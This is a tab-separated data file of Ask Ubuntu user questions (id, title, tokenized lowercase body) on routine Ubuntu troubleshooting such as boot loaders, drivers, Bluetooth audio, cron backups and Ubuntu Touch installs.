260880	ubuntu how can i send my audio output , to the mobile which is connected using bluetooth ?	my mobile running android which is using bluetooth connected to my ubuntu 12.10 64-bit . my goal is to have following step : in my ubuntu desktop i am running music from youtube mobile phone is connected to ubuntu desktop using bluetooth from my mobile i have a head phone connected to my ear i want to hear the music from my mobile the same audio which is playing in desktop how can i do that ? in this popup dialog i do n't have any kind of option to send audio output on bluetooth . follow up :
260881	ubuntu mobile programming language ?	i would like to develop a `` where 's my phone '' type application for ubuntu mobile . i was wondering if anyone could suggest which language i should be using ? or what would be the most appropriate ?
260882	make an app receive all keyboard events ( or as many as possible )	every once in a while , i come across a piece of some useful software that has hardcoded keyboard shortcuts that conflict with my system wide keyboard shortcuts . it seems to me like there 's some sort of hierarchy of programs when it comes to receiving key presses ( e.g. , ctr-alt-fx are always do not get to x , some shortcuts are intercepted by the window manager , some by user-leve deamons , etc. ) . i 've been wondering if this is really the case ( the hiararchy , that is ) and if so , i 'd like to know if there is a way to move an app to the very top of it ( i.e . make it the number one applications keypressess are sent to ) . i would prefer some kind of quick way to do this temporarily , so that i can get around system-wide keyboard shortcuts for the time i 'll be using such an app .
260883	how to automate installing ruby and setting it as the global system version ?	installing ruby is easy enough using apt-get install ruby1.9.1 . but how can i set it as the default/system/global ruby in a automated fashion ?
260884	accessing ubuntu server from a windows machine ?	i just bought a poweredge 1850 , it 's great and doing exactly what i need it to do but it 's loud so i 've placed it into my attic . the only trouble is every time i need to make a change or install new software i have to climb up there to access the machine . i tried to use putty but i get connection refused and no other hardware is using the same ip as the machine . all i want to be able to do is to remote access the terminal from my desktop pc in my room so i can install new software and run commands as if i was at my server . how can i do this ?
260889	headphones not working on windows after installing ubuntu	2 hours ago i installed ubuntu while listening to music on my headphones ( wubi install ) . i then also played music on ubuntu just fine , yet when i rebooted into windows , without doing anything else besides opening chrome , my headphones stopped working . exact same problem as in this thread : headphones not working on windows after installing kubuntu 12.10 , which was left with many doubts and no answer . luckily i have not done anything on windows after installing ubuntu 12.10 , nor have i mingled with the audio driver . i fixed the problem using some advice from a discussion thread by rebooting into linux and forcing the laptop to shutdown by holding the power button ( in order to prevent linux from muting the headphone jack in a way that windows does n't see ) . the headphones now work like before , thus it is obviously a problem originating from linux . although this trick works for now , and i assume that it will work as long as i never shutdown linux properly , i would definitely like a proper solution to this . the discussion thread where i was told to crash linux : https : //bbs.archlinux.org/viewtopic.php ? id=146773
260891	12.04 , no steam in software center ?	i have a newly installed 12.04 64bit ubuntu machine ! fully updated . but in software center , there isnt anything with steam in the name . looking for the steam 64bit client . the desktop that i have is also 12.04 64bit , it has the steam client in the software center . well at least when i installed it . did someone remove steam from the software center ? any help would be great ! ! thanks
260893	unity web apps in new tab	i have youtube intergrated into unity laucher as a webapp . but when i open it , it opens in a new window instead of opening in the existing browser window . how do i enable opening as a new tab instead of a new window ? thanks !
260895	what are my graphics option on a amd hybrid graphics macbook pro ( 8,2 ) ?	currently i 'm running the amd chip full time with fglrx drivers , and i get ok battery life . i would like to get another hour or two though , which i feel is quite possible by switching to the intel hd4000 chip . in reading the forums i see that it 's possible to do via efi boot , some kernel patches , using both opensource drivers , and vgaswitcheroo . that is n't quite ideal though . i 'd really like to be using the amd drivers , but i ca n't seem to find anywhere ( perhaps my google foo is off ) how to do this , although i have seen evidence that it is possible ( the ubuntu wiki page on fglrx for example ) . i need to be able to switch between both cards , preferably without restarting x and definitely without needing to reboot . as this is a laptop , i need to be able to run both in power saving ( intel ) and with dual displays ( as far as i know that will only work with the amd chip ) . having to restart at least 3 times a day when i go to class and come back to my desk just is n't going to work . if anyone is willing to take the time to either give me instructions on how to do this ( my skill level is higher than n00b , but less than expert ... i 've recently learned how to build custom kernels , have n't been able to figure out patching yet though ) . i have my efi partition set up , and grub configured , but it does n't boot . i get an error along the lines of `` unable to read something from hd ( 0,0 ) '' ( i have the exact message written down at my apartment , so i can post that later ) however it starts booting after than until it stops ( i assume because it ca n't load the graphics ) . does n't crash though , as it will shutdown if i push ( not hold ) the power button . bunch of questions here , but it 's really just one question and me letting you know where i 'm at with things . thanks . any help or info will be greatly appreciated .
260901	want to put ubuntu on a samsung 700z3 running windows 8	wy question is : i want ubuntu on my laptop and get rid of windows . i had ubuntu before and i love it . how can i bypass the uefi so i can get ubuntu on this laptop so i can be back on what i love ? using ubuntu to get my work done . i have ubuntu on a flashdrive its 12.10 . if there is any questions for the specs please ask .
260910	replacement of all features of outlook 2010	i 'm searching a real replacement of outlook 2010 and easy2sync for outlook for mails , schedule and contacts , but i need to synchronize mail by mail and not only the whole file between a desktop and a notebook . imap is no option . till now outlook is the most used software on my computer .
260913	how do i install ubuntu onto my usb drive ?	i ran ubuntu from a liveusb . i would like to actually install ubuntu on my usb drive while i am running ubuntu from the usb live . when i ran the installer ( by clicking the `` install '' icon on the live desktop ) , it would n't let me select my usb drive . how do i actually install ubuntu onto my usb drive ?
260917	ubuntu boot showing resume : libgcrypt version : 1.5.0	my boot is very slow , when it is loading displays resume : libgcrypt version : 1.5.0 after ~20 seconds it continues booting and lets me log in . here is a video that i made showing what i mean . computer model : samsung series 5 np550p5c-t01us 15 '' running : ubuntu 12.10
260918	how do i update an individual package without breaking future updates ?	i 'm on a lts release and want it to remain lts . however , i have an individual package called libmlx4-1 that i need to update to version 1.04 ( i.e . libmlx4-1 ) . this is in the ubuntu 12.10 ( quantal ) release but not 12.04 ( precise ) yet and i need that . how can i obtain this individual package from 12.04 ( which already has it 's dependencies met on 12.04 ) and install it without breaking future updates ?
260922	how do i change the login manager in lubuntu	i 've looked and looked for an answer - but i like ubuntu 's login manager , and ca n't figure out how to change lubuntu 's to it . i 've installed unity using these instructions : how do i install lxde / lubuntu ? , but ca n't do that with the login window ! help , i 'm a newbie ! p.s . i have lubuntu installed on a usb key - hence , i do n't want ubuntu as the main install , but just for tinkering from time to time .
260924	using the data from a drop down calendar in libreoffice calc ?	i 'm using libreoffice to make a spreadsheet ( in calc , obviously ) and have inserted a date field form control . i edited it the way i want so it has a drop down calendar . however , when i go to the form control , there 's no `` data '' tab . normally , if you have another type of form input - a checkbox , for example - there is a `` general '' , `` events '' , and `` data '' tab . you can link the data to a specific cell to see if the checkbox is `` true '' or `` false '' . there 's no data tab ! i can not for the life of me figure out how to use the date that gets entered into the date field ! you can simply select and have the date displayed in a floating field on a spreadsheet . . . i feel like this should be super obvious but i 've looked through oo and google for quite a while now . tl ; dr : does anyone know how to use the data from a date form field ?
260930	how can i make the network boot before mountall in 12.10 ?	how can i make the network boot service come up before mountall loads network shares in 12.10 ? currently , mountall attempts to mount network shares before the network drivers are loaded during the initial boot sequence giving me errors and recommendations for utilising the man pages for mount , mount.cifs , mount.nfs , etc and while it does n't create any long term issues once i 'm in x , it does slow the boot sequence significantly .
260933	connecting to windows share as guest - can not read files	i have an hp scanner with an sd card that it shares over the network . it requires no username or password to access the files . i connect to it daily with a windows 7 pc without problem . i try to use ubuntu 's nautilus `` connect to server '' feature to connect to it by ip address and it requires a username , password , and domain . i provide `` guest '' , `` password '' , and `` workgroup '' as the values . it connects and i can list the files , but if i try to download one of them , i get a `` permission denied '' message . funny thing is , i can rename them . i just ca n't copy or read them . ideas ? what can i provide to help troubleshoot ?
260940	ca n't scan videos with mythbuntu 12.04.2 + updates	i 'm in the process of updating my system . have been using mythdora prior , so new to mythbuntu . i installed mythbuntu 12.04.2 desktop amd64 and let it update during the install . the default path for videos is /var/lib/mythtv/videos from what i can see in the backend setup . i sftp 'd a mp4 file to this directory . i then try to scan for videos . about 20s later a message pops up `` the video scan found no files , have you configured a video storage group ? '' . i know the video storage group is set to /var/lib/mythtv/videos so it appears i have . i uploaded the file using the account user/pass i created during the mythbuntu install . i see other posts about ubuntu permission issues so tried a : sudo chown mythtv file.mp4 and then rescan w/o success . when i go into the filters the text filter section is blank . i tried * + save ... this option did n't help on the rescan . sometimes the front end will crash while trying to scan as well . any ideas ? thanks , -mike
260941	boot repair did not fix grub rescue prompt , new install ubuntu 12.10	total linux noob . trying to install ubuntu 12.10 into an 80g ide drive . i can boot from the liveusb , and install linux successfully . i shut down , remove the usb stick , and restart . the bios screen comes up and then i get an error ending with `` grub rescue '' . i turn the computer off , reinsert the liveusb then boot from the liveusb and try installing boot repair . boot repair runs and tells me it is safe to reboot my computer , generating this url : http : //paste.ubuntu.com/5563668/ i shut down , remove the usb stick and start up again . same error message ending in `` grub rescue '' . any help would be appreciated .
260950	creating a terminal command to extract tarballs	this is pure laziness , but i 'm looking to create a custom terminal command to extract tarballs - ie `` targz '' then a filename would extract a tar.gz tarball , and `` tarbz2 '' ... well , guess . i followed the instructions for creating custom commands found here , and while i 'm sure that worked great for that asker ( who wanted a command to start a couple of things for him , which required no additional arguments or anything ) , it 's not working for me . the `` targz '' file in my ~/bin reads as follows : tar -xzvf what wizardry . so i type targz putty-0.62.tar.gz in the terminal , and it gives me : tar : option requires an argument -- 'f' any way to make this work so i can just type `` targz '' then the target filename into the terminal and have it be extracted ? or , for extra sloth points , type something like `` untar '' then a target filename , then have it be extracted whether it 's .gz or .bz2 ?
260952	installing ubuntu 12.10	i waited for 3 h and interrupted the install from a dvd and there was no loader for ubuntu , even though windows started after shrinking its partition . i restarted the installation and have let it go for 3 h , but other than the little wheel turning there does n't seem to be anything going on ... there is no option to restart , only suspend . is this normal ? all the system files appear to be there , although grub is not configured for dual boot ...
260956	unable to integrate facebook in ubuntu 12.10	facebook was working fine as recently as a week ago . but for whatever reason , the online account for facebook had been deleted from my system settings . when i try to re-integrate , a browser window pops up and just displays `` success ! '' and nothing happens . does anyone have a solution to this ? also , if you do , could you explain it very easily - i 'm new to linux . edit : here 's a picture of the problem from another user . http : //i.imgur.com/li2pm7c.png
260958	how to make a program appear on the desktop like conky ?	i would like to make a terminal program run and appear on the desktop in the same way that conky does ( or at least a similar ) . the effect i want to accomplish : basically conky but with a command prompt area instead .
260968	extracting images from video in 1 minute intervals	i would like to extract images from a video exp01.avi , the video is 25 minutes long . i want the images to be extracted from the video after every 1 minute interval . please someone tell me how to do that . i have tried these commands , but did not help : ffmpeg -i video.avi -r 1 -t 00:01:00 -f image image % 02d.png and ffmpeg -i video.avi -r 1/1440 -f image image % 02d.png thank you .
260970	how to use gparted for drivers with data	i would like to install ubuntu on my 640 gb external hard drive.but about 100 gb of its capacity was already used . i heard there is a program called gparted so i can creat some partition for ubuntu installation files on my external disk.but can i use this program on live-usb ubuntu . do you know a link how to use the program for this kind of situations thanks
260974	how come when ever i try to install ubuntu , the computer asks me what i want to open it with , and none of the programs in the list can open it ?	when i go to the site to download ubuntu and i click “install ubuntu desktop” , when it’s done downloading it asks me to choose from the list of programs to open it with and none of them work . even after clicking “browse” and looking for a program that would probably work with it , and none of those work either . can you help me ? note ( my current operating system is “microsoft windows xp“ . )
260978	add custom steps to source package 's debian/package.postinst ?	i have a package that incorporates an auto-generated debian/package.postinst.debhelper file into the generated binary . when i put my own code into a file at debian/package.postinst , the auto-generated file is no longer incorporated into the resulting binary . how do i add custom code to the postinst file in the generated package without blocking the use of the auto-generated code ?
260980	console prompt during boot ( for truecrypt )	in short : please provide me with a up-to-date best practice solution to mount my truecrypt volumes at boot with secure password prompt ! i may accept a answer that has nothing to do with truecrypt and just shows me how the get some prompt at a boot stage , most likely a truecrypt command will work at that point as well ! this command can be used to test it . read -n1 -r -p `` press any key to continue ... '' key i wish to not discuss any truecrypt or drive related matters , or anything else think you might think are related or could help . i like to get a prompt at boot nothing else . is this maybe possible with upstart script ? or do they run in in background as well ? what i tried already : rc.local - get ignored for whatever reason kde start script set to `` before login '' with my autologin in kde it get executed in background during kde load ( harddisk symbol ) and stops there i see nothing ca n't do anything but rename the script to get into kde .profile - gets ignored ( or runs silently in background as well ) kde start script set to `` login '' is to late it get executed when the gui is fully loaded , by backup services ( crashplan and dejapub ) are already running and do n't have the the disk mounted thats setup for backups what leads to things i want to avoid .
260981	how do i enable desktop environment ?	i have just installed ubuntu 12.10 and am able to successfully log in , but when i get to the desktop , it is blank . terminal is functioning . dell inspiron 710m , integrated intel graphics . i have tried sudo apt-get install update but i am faced with the response : e : unable to locate package update
260984	aspire one 722 freezes on startup ( and a lot of other problems )	this is driving me nuts . when my laptop feels like it ( randomly ) , it just freezes when starting up . it gets stuck in this brown screen and i have to shut it down with the power button . it might do this for about 10 boots in a row or every other boot . and that is just the start . x restarts when plugging or unplugging the pc ( sometimes ) . x also restarts if i log in with the same account on a tty . if x restarts because of any reason , i have to restart gdm ( my display manager ) manually through a tty to be able to log in or it returns me to the log in screen . i will be grateful for any solutions . i have ubuntu 12.10 on acer aspire one 722 2gb ram and 1.7gib amd proccessor .
260985	how do i update from 9.10 to the newest verson ?	i am stuck on version 9.10 karmic koala and need to update . i am not very good with computers so any simple and easy instructions would be awesome !
260988	increase playback speed of flash videos	is there a general purpose solution to increase the speed of arbitrary ( embedded ) flash videos ( youtube , vimeo , etc ) ?
260991	rtl8188ce wifi adapter is not detected after installing newest realtek driver	i have the following problem . since i installed a kernel update yesterday on my ubuntu 12.10 i thought i might check if there is a new realtek driver too for my wifi ( 8188ce chip is still very unstable in ubuntu ) . what i found was a driver released on the 7th of february this year . i downloaded and installed the driver with the result that my wireless adapter ist not recognized by the system anymore . ( http : //www.realtek.com.tw/downloads/downloadsview.aspx ? langid=1 & pnid=48 & pfid=48 & level=5 & conn=4 & downtypeid=3 & getdown=false & downloads=true # 2722 ) after untaring it i installed it like that : sudo make sudo make install sudo reboot so to resolve that issue i deinstalled it again with : sudo make uninstall but unfortunately my wireless adapter is still unrecognized . i even tried to install the older driver again in the same way but nothing changed . any ideas on that problem ? i hope i didnt wrecked my wifi adapter . lspci | grep wifi returned 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) when i try to load the driver manually i get this output : sudo modprobe rtl8192ce fatal : error inserting rtl8192ce ( /lib/modules/3.5.0-25-generic/updates/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko ) : invalid argument
260994	u1 photo display	i 've just installed u1 on my android phone . when i go into the folder my pics are presented as a list with a small icon . i would like to have them displayed as thumbnails but i ca n't find an option to do this . is it possible and if so how do i do it . cheers mike
260997	can i make retext use a different font type for displaying code ?	i 'm using retext 3.1.4 ( lubuntu 12.10 ) to make notes for myself . i want to know if it 's possible to use a different font for displaying text that is marked as code in preview mode : in the image , sort and ~/.config/pcmanfm/lubuntu/desktop-items-0.conf appear faded . i feel that 's an issue with courier ( not just in retext ) . i would like to use ubuntu mono or dejavu sans mono instead of courier . is that possible ? how ? i installed all the recommended software suggested at the time of installing retext from the lubuntu software center and that included qt configuration 4.8.3 which allows a lot of customization . i can use the fonts tab of this application to change the default font but not that of the font responsible for text in depicting code :
261002	bootmenu not loading	i changed my laptop partition a little now it ca n't load the boot menu and showing error message every time i start my laptop . how do i fix this problem or rescue my data as i can access them with ubuntu live access usb .
261006	dash is blinking	i have installed a screenlet applet and conky to my pc . but when i open dash it starting to blink and show through these applets . how do i correct this .
261014	background intelligent transfer service in ubuntu	how to use background intelligent transfer service ( bits ) in ubuntu ? thanks
261015	how do i set a custom cursor theme in ubuntu 12.04 ?	i would just like to set a custom cursor theme on my computer . i had this pack back on 10.10 from here . http : //gnome-look.org/content/show.php ? content=50663 . but i ca n't seem to recall how i did it . i 've tried just about everything . i 've installed the gnome tweak tool and tried to set it , now it works only a little bit here and there . ( certain parts of certain windows . ) if i finish through the terminal ( sudo update-alternatives -- config x-cursor-theme ) it does n't even come up as an option . even though it 's been manually inserted into usr/share/icons . is there anyone that can help me get this cursor pack working ? it would be even greater if this pack can be converted for linux use . http : //www.rw-designer.com/cursor-set/legend-of-zelda .
261018	unable to save connection remmina rdp	i have been using windows remote desktop from remmina , what i feel so awkward is i do n't see the save password button enabled , i need to frequently use my remote connection , and do n't like entering username , passwords , etc , everytime ... help me..
261022	how to share printer from ubuntu server using samba ?	i want to share my print from ubuntu server using samba to lan computers . how can i config smb.conf file to do that ?
261023	is it possible to create disposable password for a user account	some time i want to give access to my computer for my guests . how can i create a disposable password to my user account so that they have no access to my account in the future , without my permission . the password should be deleted immediately or at logout/shutdown .
261024	nethogs ioctl failed while establishing local ip	when i typed sudo nethogs eth0 in terminal and tried to monitor my internet bandwidth , i got an error ioctl failed while establishing local ip for selected device eth0 . you may specify the device on the command line . this is the output of sudo ip addr : 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc mq state down qlen1000 link/ether 20:6a:8a:5d:5d:1c brd ff : ff : ff : ff : ff : ff 3 : usb0 : < broadcast , multicast , up , lower_up > mtu 1400 qdisc pfifo_fast state unknownqlen 1000 link/ether 56:10 : e4 : e0:61 : f1 brd ff : ff : ff : ff : ff : ff inet 192.168.1.10/24 brd 192.168.1.255 scope global usb0 inet6 fe80 : :5410 : e4ff : fee0:61f1/64 scope link valid_lft forever preferred_lft forever 4 : wlan0 : < broadcast , multicast > mtu 1500 qdisc noop state down qlen 1000 link/ether 20:7c:8f:79:88 : ab brd ff : ff : ff : ff : ff : ff
261029	binding f1 key to workspace1 and so on	i 've always bound the f { 1..4 } keys to quickly switch between workspaces . now the f1 shortcut is stuck to the help popup ( `` user & system settings '' ) . i 've tried different options , the best i could get was to stop the help window to popup by binding the f1 key to workspace1 using dconf or gconf , but it still does n't switch to workspace1 . this setup has worked for years , even with the previous versions of gnome shell on debian testing . i 've switched only recently to ubuntu and both versions 12.04 and 12.10 have this issue on different computers .
261030	battery design capacity is zero ?	i 've a lenovo g780 unit for which the battery design capacity is reported as zero . this is a brand new unit . in /sys/class/power_supply/bat1 i can find the following information : power_supply_name=bat1 power_supply_status=charging power_supply_present=1 power_supply_technology=unknown power_supply_cycle_count=1491 power_supply_voltage_min_design=1000 power_supply_voltage_now=11820000 power_supply_power_now=635500000 power_supply_energy_full_design=0 power_supply_energy_full=47520000 power_supply_energy_now=36350000 power_supply_model_name= power_supply_manufacturer=li-ion power_supply_serial_number=pabas0241231 at first , i thought that this was a battery issue , but when i use windows based battery tools , i get good values for the 3 capacity values : design capacity last full charged capacity current capacity these 3 values are different in windows , so it 's not that one of the capacity values is reused for one of the other values . any idea what the problem can be ? is this a ubuntu defect ? thanks .
261039	check your internet connection	when i 'm trying to install synaptics driver for touchpad , i 'm getting the error of : check you internet connection : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/n/nepomuk-core/nepomuk-core-data_4.9.3-0ubuntu0.1_all.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/n/nepomuk-core/libnepomukcore4abi1_4.9.3-0ubuntu0.1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/n/nepomuk-core/libnepomuksync4_4.9.3-0ubuntu0.1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/n/nepomuk-core/nepomuk-core_4.9.3-0ubuntu0.1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/k/kde-runtime/kde-runtime_4.9.3-0ubuntu0.1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/k/kdepim-runtime/kdepim-runtime_4.9.3-0ubuntu0.1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/p/pykde4/python-kde4_4.9.3-0ubuntu0.1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] i have a similar issue for installing krusader as well . but the internet connection is ok for sure . your thought ?
261040	how to run a python script on startup ?	first , i know that this has been asked before . tried guides , did n't work ... so i have a python script that has a never ending loop . it accesses the internet . all i want to do is that after i log in or the computer start , this python script is executed in the background until i shut down the computer . let 's say my script is currently in my home directory named myscript.py how could i achieve this task in ubuntu 12.10 ? thank you for your answer
261042	how to customize a ubuntu install cd and ( not a livecd ) create a new iso for pxe boot ?	my requirement is as below . i would first install ubuntu 12.04 on a rack server using an iso image . install certain packages like kvm , openvswitch etc : - . i should be able to repackage everything to a new installable iso and not a livecd iso . the new iso image i should be able to place it in a pxe server and from next time onwards when i do a pxe boot of the rack server , it should boot up from the pxe image and get the ubuntu 12.04 installation done on the hard disk ( with all the new packages that i 've installed manually earlier ) . note : - - i 'm not looking livecd iso image creation . i tried remastersys , uck , reconstructor etc : - . everyone provides me a livecd iso rather than the repackaged installer iso . - i do not want to use the livecd iso because , i would be rebooting the rack server after the installation many a times as part of certain testing activity and i want any new data to be persistent across every reboot . ( i do not want to go for any usb drive also ) . please help me in repackaging the ubuntu installer iso with my pacakges ( again not livecd iso ) . appreciate all your help in this matter . i 'm in an urgent need for this . thanks and regards -vinu
261043	formatting a drive in windows 7 before installing ubuntu from bootable dvd	pretty simple question i think . i am going to install a 2terabyta sata drive in my pc , i want to partion it using windows disk manager ( a 500gig for ubuntu the other 1500 for storage ) if i choose to format the 500 gig partition from windows ready for the ubuntu install . will this work ? ie : fat32 or ntfile system ? or does ubuntu have it own file system which the partion needs to be formatted in off the bootable dvd ? im assuming it needs it own is correct ? and also , will ubuntu have any trouble accessing other hdd on my pc they might be formatted by nt or fat 32 etc.. thanks , looking forward to giving ubuntu a crack .
261051	home directory encryption	i 've just encrypted my home directory after installing ubuntu ( i.e . my home directory was initially not encrypted then i used the ecryptfs-utils to encrypt it ) . i am curious to know whether only the current content of home directory would be encrypted or all data saved further will also encrypted ? thanks in advance .
261056	directory permissions / create mask ( samba ) ( ubuntu server os directorys )	i want to understand the permissions a bit more ! so i have a few questions : does this change the directory 's permission ? sudo chmod -r 0777 directory and is there a list for the `` create mask '' and `` directory mask '' codes ?
261058	ubuntu touch - how to revert to android	i 'm trying to revert back to android after having installed ubuntu touch preview . i have followed the steps on the installation instructions . however when i try to run sudo flash-all.sh nothing happens . any help ?
261063	ubuntu 64 bit not working acer p253e	i have read the others about this but to no avail . i installed ubuntu 12.04.2 64 bit and then did an update but now ubuntu wo n't boot . i have checked to see whether my laptop is 64 bit ( dual core ) and it is . 12.04.2 worked tho . 12.10 64 bit not . it comes up on the splash and then goes black and i ca n't do anything . i want to develop for ubuntu phone ( porting ) so need 64bit . also 32 bit works even with 13.04 . is this a known problem with 64 bit after 12.04 and how can i boot into safe mode ? ca n't even edit boot options . the specs are : resolution 1366 x 768 , 16:9 format intelâž pentium b960 cpu with 2x 2,20 ghz intel hd 3000 grafik 4096 mb ddr3 ram , max 8192 mb 500 gb hdd , 5.400 u/min wlan ( acer invilink 802.11b/g/draft-n ) vga , hdmi , 2x usb , gbit-lan dvd super multi dvd ( dlâąrw/cdrw ) edit : i have just been able to get into terminal mode and it appears that the upgrade has caused an error where there are no displays detected . it says : could not open x display maybe i need to edit the file ? i tried opening xorg.config in nano but it says file not found ... any help would be great
261065	can i ssh into a specific directory ?	i ssh into a multitude of different servers every day and some of them have different filesystem structures for their websites . each time i change server , i have to work out where i 'm going to get to the files i really want ( because it 's very rarely that i want to be in ~ ) . i use fabric files to automate all my actions ( pushing to git , automated ssh to the server to pull from git , restarting the web application , changing dependencies , etc ) , so i was wondering if i could n't also tell it that i want to ssh into the right directory so i can run fab ssh and be in a normal ssh session , just in the right place and start working immediately . this is not about fabric though ; please ignore it . fabric is just running a batch of commands . my argument is with the ssh command . that 's what i 'll be telling fabric to run . so how i can get ssh to cd into a specific directory on login ? note : this can not be a server or user-wide thing . i have multiple websites under one user on some servers so sticking something in ~/.bashrc would not work for me .
261068	grub not showing after installation	i have formatted my machine with ubuntu covering the full drive . now i want to install windows xp on it ( dont want to keep ubuntu on it as the user was not computer savvy ) . the bootable disk is not showing in the screen . i believe we have to change some setting in the grub loader of ubuntu - but not sure about this . any ideas ?
261071	patch , compile and run wine without installing	i 'm not familiar with compiling software from source . i would like to test a patched version of wine following this procedure . i already have wine installed and do not wish to modify it . i just want to have a secondary installation with a patched wine . how do i go about doing this ?
261078	how to hide rulers , statusbar , scrollbars in gimp persistently ?	i am using gimp 2.6.12 on ubuntu 12.04 . i would like to hide the rulers , the status bar and the scrollbars but they keep reappearing after restarting gimp . how do i make them disappear forever ? i have also disabled the menubar and that stays hidden , just as i want it . why are those others misbehaving ?
261079	how can i create zip file with the date in its name ?	in the command-line , how can i create a zip file from a directory , whose name would be the current date ? i can use zip -r name dir , but how give it the date for a name ?
261085	python 3.2 remove issue	i have install python3.2 alongside python 2.7.3 on ubuntu 12.04 through sudo apt-get install python3.2 . and now i removed it through sudo apt-get remove python3.2 . then when i type python3.2 in terminal , it show : python 3.2.3 ( default , oct 19 2012 , 20:10:41 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information .
261089	destination unreachable with ping6 between two local machines	i have 2 ubuntu machines one acting as ipv6 wireless router ( running hostap and radvd on wlan0 ) and the other is connected to that router . the router wlan0 interface has the address 2001 : db8:1:1 : :1/64 and the host has the address 2001 : db8:1:1 : :2/64 on wlan0 which is connected to ap1 provided by the router . on wireshark , i can see the router advertisements at the router and the host . when i ping 2001 : db8:1:1 : :2 at the router it says that destination unreachable : address unreachable and i can see the neighbour solicitation and advertisement messages exchange . when i ping 2001 : db8:1:1 : :1 at the host it says the same destination unreachable : address unreachable and i can see the neighbour solicitation message only . any idea ? also , i have tried to do the following into the router sudo ip -6 neigh add 2001 : db8:1:1 : :2 lladdr 64:50:03 : ec : cc : ss dev wlan0 sudo ip -6 neigh add 2001 : db8:1:1 : :1 lladdr 64:50:03 : ec : cc : ff dev wlan0 then , when i ping i can see the echo request and reply exchange in wireshark only but i can not see that at the command line , rather it says no packets have been received !
261094	create backup from directory	i would like to create backup from directory using cron . i wrote following command : cd path & & sudo zip -r `` backup- $ ( date + '' % y- % m- % d '' ) .zip '' git/ & & sudo mv `` backup- $ ( date + '' % y- % m- % d '' ) .zip '' /backup/ when i call it from commandline then everything is ok . but when i put it to cron then it does not work . log contains only part of this command and nothing more . what shall i do ? crontab content : * * * * * cd path & & zip -r `` backup- $ ( date + '' % y- % m- % d '' ) .zip '' git/ & & mv `` backup- $ ( date + '' % y- % m- % d '' ) .zip '' /backup/
261098	how to install ubuntu in android os , v2.3 ( gingerbread ) phone ?	can any one guide me installing ubuntu in `` huawei u8800 pro '' which uses `` android os , v2.3 ( gingerbread ) '' as the operating system ? any thoughts whether ubuntu can be installed in this phone ? thanks in advance . thanks and regards , gary
261099	ubuntu phone android tv tablet ?	i am a bit confused ( about ubuntu touch/phone/android/tv/tablet ) . is the ubuntu os for phone the same as ubuntu for android if i have a phone with ubuntu ( touch ) on it , how do i use it to connect it to a monitor ( and connect a keyboard/mouse ) ? will the phone behave as a pc or will the swipe stuff still swipe ( i have no touchscreen/monitor , just a plain ol ' tft monitor ) can i hook the phone to my tv and watch movies ? ( not without a streaming device/pc right ? i have a laptop right now hooked to the tv with a hd filled with movies , is n't that a better way of watching movies ? thnx for your response !
261100	create zip of folder with same name	i want to create zip of a folder from command-line . i can do something like zip -r folder.zip folder . i want to give the zipped folder same name as the original folder . i can simulate this by writing a script : # ! /bin/bash zip -r $ 1 $ 1 and then doing ./script folder . is it possible to do this without writing any script ?
261101	change default mail client	i 'm running ubuntu 12.04 and i 'm trying to change my default mail client ( to evolution ) , i 'm fairly new to ubuntu and linux but i 've gone to system settings > details > default applications & change it . yet when i click the system tray icon thing at the top , it still brings up thunderbird when i click `` compose new mail '' and what not , does anyone know how to fix this ?
261105	how to compile a c++11 program using future in ubuntu 12.04 ?	i 'm trying to compile a c++ program in ubuntu 12.04 . i 'm using g++ 4.7 ( installed from a ppa ) . i 'm using std : :future , but i have an error . the code : $ cat main.cpp # include < iostream > # include < boost/thread/thread.hpp > # include < future > int foo ( const int & i ) { return i*i ; } int main ( ) { for ( int i = 0 ; i < 10 ; ++i ) { std : :future < int > foo = boost : :bind ( & foo , i ) ; std : :cout < < foo < < std : :endl ; } return 0 ; } my makefile : $ cat makefile all : ex cc= g++-4.7 -std=gnu++0x link= -o arg= -c -o lib= -lboost_thread-mt objets= main.o ex : $ { objets } @ $ { cc } $ { link } ex $ { objets } $ { lib } % .o : % .cpp % .h @ $ { cc } $ { arg } $ @ $ < $ { lib } the error : $ make g++ -c -o main.o main.cpp in file included from /usr/include/c++/4.6/future:35:0 , from main.cpp:3 : /usr/include/c++/4.6/bits/c++0x_warning.h:32:2 : error : # error this file requires compiler and library support for the upcoming iso c++ standard , c++0x . this support is currently experimental , and must be enabled with the -std=c++0x or -std=gnu++0x compiler options . main.cpp : in function ‘int main ( ) ’ : main.cpp:14:3 : error : ‘future’ is not a member of ‘std’ main.cpp:14:16 : error : expected primary-expression before ‘int’ main.cpp:14:16 : error : expected ‘ ; ’ before ‘int’ main.cpp:17:14 : error : ‘foo’ was not declared in this scope make : *** [ main.o ] error 1 how to get rid of this ? : )
261107	dual boot issue , windows 7 64 bit ubuntu 12.10 64 bit	i just wanted to give you my bootlog and see whether anyone can help me . i have already applied the recommended boot repair solution , i get to see grub now but windows 7 is not listed . your help is very much appreciated my bootlog : http : //paste.ubuntu.com/5564838/
261108	ubuntu tablet on nexus 7 - where is the new ui ?	i have followed both sets of instructions here : https : //wiki.ubuntu.com/nexus7/installation but both methods are installing the ubuntu desktop to the device ? this is quite an impressive feat on its own , but i have seen videos of people using the phone ui on a nexus 7 ? is there an alternative install that i can try to achieve this ?
